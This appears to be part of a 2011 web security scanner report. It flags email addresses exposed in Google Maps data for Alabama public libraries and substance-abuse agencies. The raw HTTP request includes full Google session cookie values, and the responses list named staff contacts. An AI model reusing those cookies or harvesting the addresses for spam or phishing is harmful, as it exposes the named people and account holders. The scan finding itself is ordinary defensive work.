ibrary",description:"\x3cb\x3eAdamsville Public Library\x3c/b\x3e\x3cbr\x3e4825 Main Street\x3cbr\x3eAdamsville, AL 35005-0241\x3cbr\x3e205-674-3399\x3cbr\x3e205-674-5405\x3cbr\x3e\x3ca href=\"mailto:clemley@bham.lib.al.us\" target=\"_blank\"\x3eclemley@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.adamsville.lib.al.us\" target=\"_blank\"\x3ehttp://www.adamsville.lib.al.us\x3c/a\x3e",infoWindow:{title:"Adamsville Public Library",basics:"\x3cdiv transclu
...[SNIP]...
205-674-33992",dscr:"\x3cb\x3eAdamsville Public Library\x3c/b\x3e\x3cbr\x3e4825 Main Street\x3cbr\x3eAdamsville, AL 35005-0241\x3cbr\x3e205-674-3399\x3cbr\x3e205-674-5405\x3cbr\x3e\x3ca href=\"mailto:clemley@bham.lib.al.us\" target=\"_blank\"\x3eclemley@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.adamsville.lib.al.us\" target=\"_blank\"\x3ehttp://www.adamsville.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x
...[SNIP]...
ibrary",description:"\x3cb\x3eBessemer Public Library\x3c/b\x3e\x3cbr\x3e701 9th Avenue North\x3cbr\x3eBessemer, AL 35020-5305\x3cbr\x3e205-428-7882\x3cbr\x3e205-428-7885\x3cbr\x3e\x3ca href=\"mailto:ccastine@bham.lib.al.us\" target=\"_blank\"\x3eccastine@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bessemer.lib.al.us\" target=\"_blank\"\x3ehttp://www.bessemer.lib.al.us\x3c/a\x3e",infoWindow:{title:"Bessemer Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-428-78822",dscr:"\x3cb\x3eBessemer Public Library\x3c/b\x3e\x3cbr\x3e701 9th Avenue North\x3cbr\x3eBessemer, AL 35020-5305\x3cbr\x3e205-428-7882\x3cbr\x3e205-428-7885\x3cbr\x3e\x3ca href=\"mailto:ccastine@bham.lib.al.us\" target=\"_blank\"\x3eccastine@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bessemer.lib.al.us\" target=\"_blank\"\x3ehttp://www.bessemer.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=
...[SNIP]...
Library",description:"\x3cb\x3eBirmingham Public Library\x3c/b\x3e\x3cbr\x3e2100 Park Place\x3cbr\x3eBirmingham, AL 35203-2794\x3cbr\x3e205-226-3610\x3cbr\x3e205-226-3743\x3cbr\x3e\x3ca href=\"mailto:barbara@bham.lib.al.us\" target=\"_blank\"\x3ebarbara@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bplonline.org\" target=\"_blank\"\x3ehttp://www.bplonline.org\x3c/a\x3e",infoWindow:{title:"Birmingham Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\
...[SNIP]...
205-226-361020",dscr:"\x3cb\x3eBirmingham Public Library\x3c/b\x3e\x3cbr\x3e2100 Park Place\x3cbr\x3eBirmingham, AL 35203-2794\x3cbr\x3e205-226-3610\x3cbr\x3e205-226-3743\x3cbr\x3e\x3ca href=\"mailto:barbara@bham.lib.al.us\" target=\"_blank\"\x3ebarbara@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.bplonline.org\" target=\"_blank\"\x3ehttp://www.bplonline.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
ry",description:"\x3cb\x3eEmmet O\"Neal Public Library\x3c/b\x3e\x3cbr\x3e50 Oak Street \x3cbr\x3eMountian View, AL 35213-4295\x3cbr\x3e205-879-0459\x3cbr\x3e205-879-5388\x3cbr\x3e\x3ca href=\"mailto:smurrell@bham.lib.al.us\" target=\"_blank\"\x3esmurrell@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.eolib.org\" target=\"_blank\"\x3ehttp://www.eolib.org\x3c/a\x3e",infoWindow:{title:"Emmet O\x26quot;Neal Public Library",basics:"\x3cdiv transclude=\"iw\"\x3
...[SNIP]...
05-879-04",dscr:"\x3cb\x3eEmmet O\"Neal Public Library\x3c/b\x3e\x3cbr\x3e50 Oak Street \x3cbr\x3eMountian View, AL 35213-4295\x3cbr\x3e205-879-0459\x3cbr\x3e205-879-5388\x3cbr\x3e\x3ca href=\"mailto:smurrell@bham.lib.al.us\" target=\"_blank\"\x3esmurrell@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.eolib.org\" target=\"_blank\"\x3ehttp://www.eolib.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=3
...[SNIP]...
description:"\x3cb\x3eFultondale Public Library\x3c/b\x3e\x3cbr\x3e1015 Walkers Chapel Road\x3cbr\x3eFultondale, AL 35068-0549\x3cbr\x3e205-849-6335\x3cbr\x3e205-327-5692\x3cbr\x3e\x3ca href=\"mailto:cstarkey@bham.lib.al.us\" target=\"_blank\"\x3ecstarkey@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.fultondale.lib.al.us\" target=\"_blank\"\x3ehttp://www.fultondale.lib.al.us\x3c/a\x3e",infoWindow:{title:"Fultondale Public Library",basics:"\x3cdiv transclu
...[SNIP]...
205-8",dscr:"\x3cb\x3eFultondale Public Library\x3c/b\x3e\x3cbr\x3e1015 Walkers Chapel Road\x3cbr\x3eFultondale, AL 35068-0549\x3cbr\x3e205-849-6335\x3cbr\x3e205-327-5692\x3cbr\x3e\x3ca href=\"mailto:cstarkey@bham.lib.al.us\" target=\"_blank\"\x3ecstarkey@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.fultondale.lib.al.us\" target=\"_blank\"\x3ehttp://www.fultondale.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x
...[SNIP]...
brary",description:"\x3cb\x3eAliceville Public Library\x3c/b\x3e\x3cbr\x3e416 3rd Avenue NE\x3cbr\x3eAliceville, AL 35442-2207\x3cbr\x3e205-373-6691\x3cbr\x3e205-373-6691\x3cbr\x3e\x3ca href=\"mailto:apl@ns1.pickens.net\" target=\"_blank\"\x3eapl@ns1.pickens.net\x3c/a\x3e",infoWindow:{title:"Aliceville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Aliceville Public Library416 3rd Avenue NEAliceville, AL 35442-2207205-373-6691",dscr:"\x3cb\x3eAliceville Public Library\x3c/b\x3e\x3cbr\x3e416 3rd Avenue NE\x3cbr\x3eAliceville, AL 35442-2207\x3cbr\x3e205-373-6691\x3cbr\x3e205-373-6691\x3cbr\x3e\x3ca href=\"mailto:apl@ns1.pickens.net\" target=\"_blank\"\x3eapl@ns1.pickens.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.129227,-88.147810\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc35",fid:"gb0
...[SNIP]...
ry",description:"\x3cb\x3eCarrollton Public Library\x3c/b\x3e\x3cbr\x3e225 Commerce Avenue\x3cbr\x3eCarrollton , AL 35447-0092\x3cbr\x3e205-367-2142\x3cbr\x3e205-367-2142\x3cbr\x3e\x3ca href=\"mailto:cpl@pickens.net\" target=\"_blank\"\x3ecpl@pickens.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pickens.net/\" target=\"_blank\"\x3ehttp://www.pickens.net/\"cpl\x3c/a\x3e",infoWindow:{title:"Carrollton Public Library",basics:"\x3cdiv transclude=\"iw\"\x
...[SNIP]...
205-367-2",dscr:"\x3cb\x3eCarrollton Public Library\x3c/b\x3e\x3cbr\x3e225 Commerce Avenue\x3cbr\x3eCarrollton , AL 35447-0092\x3cbr\x3e205-367-2142\x3cbr\x3e205-367-2142\x3cbr\x3e\x3ca href=\"mailto:cpl@pickens.net\" target=\"_blank\"\x3ecpl@pickens.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pickens.net/\" target=\"_blank\"\x3ehttp://www.pickens.net/\"cpl\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h
...[SNIP]...
do Public Library",description:"\x3cb\x3eGordo Public Library\x3c/b\x3e\x3cbr\x3e287 Main Street\x3cbr\x3eGordo, AL 35466-0336\x3cbr\x3e205-364-7148\x3cbr\x3e205-364-7148\x3cbr\x3e\x3ca href=\"mailto:gordolib@pickens.net\" target=\"_blank\"\x3egordolib@pickens.net\x3c/a\x3e",infoWindow:{title:"Gordo Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Gordo Public Library287 Main StreetGordo, AL 35466-0336205-364-7148205-364-7148",dscr:"\x3cb\x3eGordo Public Library\x3c/b\x3e\x3cbr\x3e287 Main Street\x3cbr\x3eGordo, AL 35466-0336\x3cbr\x3e205-364-7148\x3cbr\x3e205-364-7148\x3cbr\x3e\x3ca href=\"mailto:gordolib@pickens.net\" target=\"_blank\"\x3egordolib@pickens.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.321668,-87.903102\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc37",fid:"ga5
...[SNIP]...
3cb\x3ePickens County Cooperative Library\x3c/b\x3e\x3cbr\x3ePost Office Bldg Highway 17 S\x3cbr\x3eCarrollton , AL 35447-0489\x3cbr\x3e205-367-8407\x3cbr\x3e205-367-8407\x3cbr\x3e\x3ca href=\"mailto:pccl@pickens.net\" target=\"_blank\"\x3epccl@pickens.net\x3c/a\x3e",infoWindow:{title:"Pickens County Cooperative Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Pickens County Cooperative LibraryPost Office Bldg Highway 17 SCarrollton
...[SNIP]...
3cb\x3ePickens County Cooperative Library\x3c/b\x3e\x3cbr\x3ePost Office Bldg Highway 17 S\x3cbr\x3eCarrollton , AL 35447-0489\x3cbr\x3e205-367-8407\x3cbr\x3e205-367-8407\x3cbr\x3e\x3ca href=\"mailto:pccl@pickens.net\" target=\"_blank\"\x3epccl@pickens.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.238309,-88.157624\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc38",fid:"g64
...[SNIP]...
ic Library",description:"\x3cb\x3eReform Public Library\x3c/b\x3e\x3cbr\x3e302 1st Street South\x3cbr\x3eReform, AL 35481-0819\x3cbr\x3e205-375-6240\x3cbr\x3e205-375-6240\x3cbr\x3e\x3ca href=\"mailto:rlibrary@pickens.net\" target=\"_blank\"\x3erlibrary@pickens.net\x3c/a\x3e",infoWindow:{title:"Reform Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Reform Public Library302 1st Street SouthReform, AL 35481-0819205-375-6240205-3",dscr:"\x3cb\x3eReform Public Library\x3c/b\x3e\x3cbr\x3e302 1st Street South\x3cbr\x3eReform, AL 35481-0819\x3cbr\x3e205-375-6240\x3cbr\x3e205-375-6240\x3cbr\x3e\x3ca href=\"mailto:rlibrary@pickens.net\" target=\"_blank\"\x3erlibrary@pickens.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.415065,-88.009684\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc39",fid:"gcc
...[SNIP]...
ibrary",description:"\x3cb\x3eTroy Public Library\x3c/b\x3e\x3cbr\x3e300 North Three Notch Street\x3cbr\x3eTroy, AL 36081-2022\x3cbr\x3e334-670-6208\x3cbr\x3e334-670-6208\x3cbr\x3e\x3ca href=\"mailto:wwhite@publiclibrary.troy.al.us\" target=\"_blank\"\x3ewwhite@publiclibrary.troy.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://publiclibrary.troy.al.us\" target=\"_blank\"\x3ehttp://publiclibrary.troy.al.us\x3c/a\x3e",infoWindow:{title:"Troy Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
334-670-62083",dscr:"\x3cb\x3eTroy Public Library\x3c/b\x3e\x3cbr\x3e300 North Three Notch Street\x3cbr\x3eTroy, AL 36081-2022\x3cbr\x3e334-670-6208\x3cbr\x3e334-670-6208\x3cbr\x3e\x3ca href=\"mailto:wwhite@publiclibrary.troy.al.us\" target=\"_blank\"\x3ewwhite@publiclibrary.troy.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://publiclibrary.troy.al.us\" target=\"_blank\"\x3ehttp://publiclibrary.troy.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x
...[SNIP]...
ription:"\x3cb\x3eTupper Lightfoot Memorial Library\x3c/b\x3e\x3cbr\x3e164 South Main Street\x3cbr\x3eBrundidge, AL 36010-1809\x3cbr\x3e334-735-2145\x3cbr\x3e334-735-2145\x3cbr\x3e\x3ca href=\"mailto:bdgelib@email.com\" target=\"_blank\"\x3ebdgelib@email.com\x3c/a\x3e",infoWindow:{title:"Tupper Lightfoot Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Tupper Lightfoot Memorial Library164 South Main StreetBrundidge, AL 36010-
...[SNIP]...
3",dscr:"\x3cb\x3eTupper Lightfoot Memorial Library\x3c/b\x3e\x3cbr\x3e164 South Main Street\x3cbr\x3eBrundidge, AL 36010-1809\x3cbr\x3e334-735-2145\x3cbr\x3e334-735-2145\x3cbr\x3e\x3ca href=\"mailto:bdgelib@email.com\" target=\"_blank\"\x3ebdgelib@email.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.718146,-85.815550\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc41",fid:"gea
...[SNIP]...
y",description:"\x3cb\x3eAnnie L. Awbrey Public Library\x3c/b\x3e\x3cbr\x3e736 College Street\x3cbr\x3eRoanoke , AL 36274-2632\x3cbr\x3e334-863-2632\x3cbr\x3e334-863-8997\x3cbr\x3e\x3ca href=\"mailto:annielawbrey@yahoo.com\" target=\"_blank\"\x3eannielawbrey@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Annie L. Awbrey Public Library",basics:"\
...[SNIP]...
334-863-",dscr:"\x3cb\x3eAnnie L. Awbrey Public Library\x3c/b\x3e\x3cbr\x3e736 College Street\x3cbr\x3eRoanoke , AL 36274-2632\x3cbr\x3e334-863-2632\x3cbr\x3e334-863-8997\x3cbr\x3e\x3ca href=\"mailto:annielawbrey@yahoo.com\" target=\"_blank\"\x3eannielawbrey@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
on:"\x3cb\x3ePhenix City-Russell County Public Library\x3c/b\x3e\x3cbr\x3e1501 17th Avenue\x3cbr\x3ePhenix City, AL 36867-5140\x3cbr\x3e334-297-1139\x3cbr\x3e334-298-8452\x3cbr\x3e\x3ca href=\"mailto:phenixcitylibrary@gmail.com\" target=\"_blank\"\x3ephenixcitylibrary@gmail.com\x3c/a\x3e",infoWindow:{title:"Phenix City-Russell County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Phenix City-Russell County Public Library1501 17th AvenuePhenix Cit
...[SNIP]...
cr:"\x3cb\x3ePhenix City-Russell County Public Library\x3c/b\x3e\x3cbr\x3e1501 17th Avenue\x3cbr\x3ePhenix City, AL 36867-5140\x3cbr\x3e334-297-1139\x3cbr\x3e334-298-8452\x3cbr\x3e\x3ca href=\"mailto:phenixcitylibrary@gmail.com\" target=\"_blank\"\x3ephenixcitylibrary@gmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.474868,-85.016139\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc43",fid:"gf1
...[SNIP]...
Library",description:"\x3cb\x3eAlbert L. Scott Library\x3c/b\x3e\x3cbr\x3e100 9th Street NW\x3cbr\x3eAlabaster, AL 35007-9172\x3cbr\x3e205-664-6822\x3cbr\x3e205-664-6839\x3cbr\x3e\x3ca href=\"mailto:nabbott@shelbycounty-al.org\" target=\"_blank\"\x3enabbott@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Albert L. Scott Library",basics:"\x3cdiv transclude=\
...[SNIP]...
205-664-6822205",dscr:"\x3cb\x3eAlbert L. Scott Library\x3c/b\x3e\x3cbr\x3e100 9th Street NW\x3cbr\x3eAlabaster, AL 35007-9172\x3cbr\x3e205-664-6822\x3cbr\x3e205-664-6839\x3cbr\x3e\x3ca href=\"mailto:nabbott@shelbycounty-al.org\" target=\"_blank\"\x3enabbott@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
Public Library",description:"\x3cb\x3eCalera Public Library\x3c/b\x3e\x3cbr\x3e1241 17th Avenue\x3cbr\x3eCalera, AL 35040-0690\x3cbr\x3e205-668-3514\x3cbr\x3e205-338-3514\x3cbr\x3e\x3ca href=\"mailto:jgreathouse@shelbycounty-al.org\" target=\"_blank\"\x3ejgreathouse@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Calera Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-668-3514205-338-3",dscr:"\x3cb\x3eCalera Public Library\x3c/b\x3e\x3cbr\x3e1241 17th Avenue\x3cbr\x3eCalera, AL 35040-0690\x3cbr\x3e205-668-3514\x3cbr\x3e205-338-3514\x3cbr\x3e\x3ca href=\"mailto:jgreathouse@shelbycounty-al.org\" target=\"_blank\"\x3ejgreathouse@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
ibrary",description:"\x3cb\x3eColumbiana Public Library\x3c/b\x3e\x3cbr\x3e50 Lester Street\x3cbr\x3eColumbiana, AL 35051-1459\x3cbr\x3e205-669-5812\x3cbr\x3e205-669-5803\x3cbr\x3e\x3ca href=\"mailto:dheritage@sheblycounty-al.org\" target=\"_blank\"\x3edheritage@sheblycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Columbiana Public Library",basics:"\x3cdiv transclude
...[SNIP]...
205-669-58122",dscr:"\x3cb\x3eColumbiana Public Library\x3c/b\x3e\x3cbr\x3e50 Lester Street\x3cbr\x3eColumbiana, AL 35051-1459\x3cbr\x3e205-669-5812\x3cbr\x3e205-669-5803\x3cbr\x3e\x3ca href=\"mailto:dheritage@sheblycounty-al.org\" target=\"_blank\"\x3edheritage@sheblycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
,description:"\x3cb\x3eHarrison Regional Library System\x3c/b\x3e\x3cbr\x3e50 Lester Street\x3cbr\x3eColumbiana, AL 35051-9477\x3cbr\x3e205-669-3910\x3cbr\x3e205-669-3940\x3cbr\x3e\x3ca href=\"mailto:broberts@pelhamonline.com\" target=\"_blank\"\x3ebroberts@pelhamonline.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Harrison Regional Library System",basics:"\x3cdiv tra
...[SNIP]...
205-66",dscr:"\x3cb\x3eHarrison Regional Library System\x3c/b\x3e\x3cbr\x3e50 Lester Street\x3cbr\x3eColumbiana, AL 35051-9477\x3cbr\x3e205-669-3910\x3cbr\x3e205-669-3940\x3cbr\x3e\x3ca href=\"mailto:broberts@pelhamonline.com\" target=\"_blank\"\x3ebroberts@pelhamonline.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
Public Library",description:"\x3cb\x3eHelena Public Library\x3c/b\x3e\x3cbr\x3e230 Tucker Road\x3cbr\x3eHelena, AL 35080-0262\x3cbr\x3e205-664-8308\x3cbr\x3e205-664-4593\x3cbr\x3e\x3ca href=\"mailto:vashford@sheblycounty-al.org\" target=\"_blank\"\x3evashford@sheblycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Helena Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-664-8308205-664-45",dscr:"\x3cb\x3eHelena Public Library\x3c/b\x3e\x3cbr\x3e230 Tucker Road\x3cbr\x3eHelena, AL 35080-0262\x3cbr\x3e205-664-8308\x3cbr\x3e205-664-4593\x3cbr\x3e\x3ca href=\"mailto:vashford@sheblycounty-al.org\" target=\"_blank\"\x3evashford@sheblycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.shelbycounty-al.org\" target=\"_blank\"\x3ehttp://www.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
Library",description:"\x3cb\x3eLallouise F. McGraw Library\x3c/b\x3e\x3cbr\x3e42860 Highway 25\x3cbr\x3eVincent, AL 35178-0003\x3cbr\x3e205-672-2749\x3cbr\x3e205-672-2749\x3cbr\x3e\x3ca href=\"mailto:vincentlibrary@shelbycounty-al.org\" target=\"_blank\"\x3evincentlibrary@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.shebycounty-al.org\" target=\"_blank\"\x3ewww.shebycounty-al.org\x3c/a\x3e",infoWindow:{title:"Lallouise F. McGraw Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3
...[SNIP]...
205-672-274920",dscr:"\x3cb\x3eLallouise F. McGraw Library\x3c/b\x3e\x3cbr\x3e42860 Highway 25\x3cbr\x3eVincent, AL 35178-0003\x3cbr\x3e205-672-2749\x3cbr\x3e205-672-2749\x3cbr\x3e\x3ca href=\"mailto:vincentlibrary@shelbycounty-al.org\" target=\"_blank\"\x3evincentlibrary@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.shebycounty-al.org\" target=\"_blank\"\x3ewww.shebycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26
...[SNIP]...
c Library",description:"\x3cb\x3eHomewood Public Library\x3c/b\x3e\x3cbr\x3e1721 Oxmoor Road\x3cbr\x3eHomewood , AL 35209-4085\x3cbr\x3e205-877-8661\x3cbr\x3e205-802-6424\x3cbr\x3e\x3ca href=\"mailto:homewood@bham.lib.al.us\" target=\"_blank\"\x3ehomewood@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.homewood.lib.al.us\" target=\"_blank\"\x3ehttp://www.homewood.lib.al.us\x3c/a\x3e",infoWindow:{title:"Homewood Public Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-877-8661205-",dscr:"\x3cb\x3eHomewood Public Library\x3c/b\x3e\x3cbr\x3e1721 Oxmoor Road\x3cbr\x3eHomewood , AL 35209-4085\x3cbr\x3e205-877-8661\x3cbr\x3e205-802-6424\x3cbr\x3e\x3ca href=\"mailto:homewood@bham.lib.al.us\" target=\"_blank\"\x3ehomewood@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.homewood.lib.al.us\" target=\"_blank\"\x3ehttp://www.homewood.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=
...[SNIP]...

22.65. http://maps.google.com/maps/gx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/gx?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_MENTAL_HEALTH.kml&jsv=310c&vps=1&source=maps_api&callback=_xdc_._5gn3tnggy HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:38 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:38 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 56260

_xdc_._5gn3tnggy && _xdc_._5gn3tnggy({"name":"http://www.alabama.gov/rss/maps_MENTAL_HEALTH.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat
...[SNIP]...
stance Abuse Prevention\x3c/b\x3e\x3cbr\x3e2300 Mccoy Avenue\x3cbr\x3eA\x3cbr\x3eAnniston, AL 36201\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelly Price\x3cbr\x3e256-237-8131\x3cbr\x3e\x3ca href=\"mailto:k.price@asaprev.com\" target=\"_blank\"\x3ek.price@asaprev.com\x3c/a\x3e",infoWindow:{title:"Agency for Substance Abuse Prevention",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Agency for Substance Abuse Prevention2300 Mccoy AvenueAAnniston, AL 36
...[SNIP]...
stance Abuse Prevention\x3c/b\x3e\x3cbr\x3e2300 Mccoy Avenue\x3cbr\x3eA\x3cbr\x3eAnniston, AL 36201\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelly Price\x3cbr\x3e256-237-8131\x3cbr\x3e\x3ca href=\"mailto:k.price@asaprev.com\" target=\"_blank\"\x3ek.price@asaprev.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.675695,-85.927283\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"B",fid:"gdf2522
...[SNIP]...
holism Recovery Services\x3c/b\x3e\x3cbr\x3e2101 Daniel Payne Drive\x3cbr\x3eBirmingham, AL 35214\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFred Armstead\x3cbr\x3e205-791-2042\x3cbr\x3e\x3ca href=\"mailto:armsteadph@aol.com\" target=\"_blank\"\x3earmsteadph@aol.com\x3c/a\x3e",infoWindow:{title:"Alcoholism Recovery Services",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Alcoholism Recovery Services2101 Daniel Payne DriveBirmingham, AL 35214Contact:
...[SNIP]...
